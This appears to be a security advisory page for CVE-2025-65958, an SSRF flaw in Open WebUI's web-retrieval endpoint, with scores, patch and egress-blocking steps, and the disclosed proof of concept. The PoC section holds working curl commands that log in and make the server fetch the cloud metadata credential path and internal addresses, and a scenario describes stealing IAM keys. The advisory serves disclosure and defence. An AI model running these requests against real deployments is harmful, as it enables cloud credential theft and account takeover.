CVE-2025-65958 — HIGH (CVSS 8.5) AI Security Vulnerability

Q: Is CVE-2025-65958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-65958, increasing the risk of exploitation.

Q: How to fix CVE-2025-65958?

1. PATCH: Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774). 2. WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy. 3. NETWORK EGRESS: Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups. 4. CLOUD FORENSICS: Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed. 5. DETECTION: Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs. 6. ACCESS REVIEW: Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.

Q: What systems are affected by CVE-2025-65958?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, RAG pipelines, Cloud-hosted LLM deployments, LLM serving infrastructure, Enterprise AI platforms.

Q: What is the CVSS score for CVE-2025-65958?

CVE-2025-65958 has a CVSS v3.1 base score of 8.5 (HIGH). The EPSS exploitation probability is 0.07%.

CISO Take

Any authenticated Open WebUI user can force your server to fetch cloud metadata endpoints (AWS/GCP/Azure IAM credentials), internal databases, and private network services—no admin rights required. If running Open WebUI in a cloud environment, treat IAM credentials as potentially compromised. Patch to 0.6.37 immediately; if blocked, deny egress to 169.254.169.254 and RFC1918 ranges from the Open WebUI container and disable the /api/v1/retrieval/process/web endpoint at your WAF.

Risk Assessment

High risk for cloud-hosted deployments. CVSS 8.5 with network-accessible attack vector and low-privilege entry bar makes this exploitable by any disgruntled employee or account compromise. The critical amplifier is cloud metadata endpoint access—a single unauthenticated-to-cloud request can yield IAM credentials enabling full cloud account takeover. EPSS is currently low (0.0004), but the PoC is fully public and Open WebUI is widely deployed in enterprise AI environments. Exploitation probability will rise rapidly as threat actors scan for this pattern.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
open-webui	pip	<= 0.6.36	`0.6.37`
135.3K Pushed 8d ago 58% patched ~9d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1

8.5 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 22% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR Low

UI None

S Changed

C High

I Low

A None

Recommended Action

6 steps

PATCH

Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774).
WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy.
NETWORK EGRESS

Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups.
CLOUD FORENSICS

Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed.
DETECTION

Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs.
ACCESS REVIEW

Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Data Extraction Data Leakage Code Execution API RAG AML.T0006 - Active Scanning AML.T0012 - Valid Accounts AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials AML.T0075 - Cloud Service Discovery

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System

ISO 42001

A.6.1.2 - Information Security Risk Treatment A.8.4 - AI System Security A.9.5 - AI system security

NIST AI RMF

GOVERN-1.7 - Processes for Identifying and Managing Risks MANAGE-2.2 - Mechanisms to prevent or mitigate AI risks

OWASP LLM Top 10

LLM02:2025 - Sensitive Information Disclosure LLM06 - Sensitive Information Disclosure LLM06:2025 - Excessive Agency LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-65958?

Any authenticated Open WebUI user can force your server to fetch cloud metadata endpoints (AWS/GCP/Azure IAM credentials), internal databases, and private network services—no admin rights required. If running Open WebUI in a cloud environment, treat IAM credentials as potentially compromised. Patch to 0.6.37 immediately; if blocked, deny egress to 169.254.169.254 and RFC1918 ranges from the Open WebUI container and disable the /api/v1/retrieval/process/web endpoint at your WAF.

Is CVE-2025-65958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-65958, increasing the risk of exploitation.

How to fix CVE-2025-65958?

1. PATCH: Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774). 2. WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy. 3. NETWORK EGRESS: Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups. 4. CLOUD FORENSICS: Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed. 5. DETECTION: Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs. 6. ACCESS REVIEW: Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.

What systems are affected by CVE-2025-65958?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, RAG pipelines, Cloud-hosted LLM deployments, LLM serving infrastructure, Enterprise AI platforms.

What is the CVSS score for CVE-2025-65958?

CVE-2025-65958 has a CVSS v3.1 base score of 8.5 (HIGH). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

### Summary A Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. ### Details The vulnerability exists in the /api/v1/retrieval/process/web endpoint located in backend/open_webui/routers/retrieval.py at lines 1758-1767. Vulnerable code: @router.post("/process/web") def process_web( request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user) ): try: collection_name = form_data.collection_name if not collection_name: collection_name = calculate_sha256_string(form_data.url)[:63] content, docs = get_content_from_url(request, form_data.url) # ← SSRF vulnerability The form_data.url parameter is passed directly to get_content_from_url() without any validation. This function chain ultimately calls web loaders that fetch arbitrary URLs: Call chain: 1. retrieval.py:1767 → get_content_from_url(request, form_data.url) 2. retrieval/utils.py:77 → get_loader(request, url) 3. retrieval/utils.py:62 → get_web_loader(url, ...) or YoutubeLoader(url, ...) 4. Both loaders fetch the user-supplied URL without validation No validation is performed for: - Private IP ranges (RFC1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) - Localhost addresses (127.0.0.0/8) - Cloud metadata endpoints (169.254.169.254, fd00:ec2::254) - Protocol restrictions (file://, gopher://, etc.) - Domain allowlisting ### PoC Prerequisites: Valid user account (any role) Step 1 - Authenticate: TOKEN=$(curl -s "http://localhost:3000/api/v1/auths/signin" \ -H 'Content-Type: application/json' \ -d '{"email":"user@example.com","password":"password"}' \ | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") Step 2 - Basic SSRF Test (external URL): curl -s "http://localhost:3000/api/v1/retrieval/process/web" \ -H "Authorization: Bearer $TOKEN" \ -H 'Content-Type: application/json' \ -d '{"url":"http://example.com"}' Result: Server fetches example.com and returns its content, proving the vulnerability. { "status": true, "file": { "data": { "content": "Example Domain This domain is for use in documentation..." } } } Step 3 - Advanced Attack (AWS metadata): curl -s "http://localhost:3000/api/v1/retrieval/process/web" \ -H "Authorization: Bearer $TOKEN" \ -H 'Content-Type: application/json' \ -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' Result: Server exposes cloud credentials if running on AWS/GCP/Azure. Other attack examples: - Internal network: {"url":"http://192.168.1.1"} - Localhost services: {"url":"http://localhost:5432"} - Internal APIs: {"url":"http://internal-api.local"} ### Impact Who is affected: All authenticated users (no special permissions required) Attack capabilities: 1. Cloud Environment Compromise - Steal AWS/GCP/Azure credentials via metadata endpoints - Result: Full cloud account takeover 2. Internal Network Access - Bypass firewalls to access internal services (databases, admin panels, APIs) - Port scan and map internal infrastructure - Result: Complete network visibility 3. Data Exfiltration - Read internal documentation, configurations, secrets - Access Kubernetes API servers - Result: Credential theft, API key exposure

Exploitation Scenario

An insider threat or attacker with a compromised standard user account authenticates to the corporate Open WebUI deployment. They POST to /api/v1/retrieval/process/web with payload {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}, targeting the AWS instance metadata service. The Open WebUI server fetches the URL server-side and returns the IAM role name in the response. A follow-up request to the role-specific endpoint returns AccessKeyId, SecretAccessKey, and Token in plaintext. The attacker exports these credentials to their own system and uses AWS CLI to enumerate S3 buckets, access RDS snapshots, or assume higher-privileged roles—achieving full cloud account takeover. Total time from login to cloud credential exfiltration: under 5 minutes. Minimal application-layer forensic trace.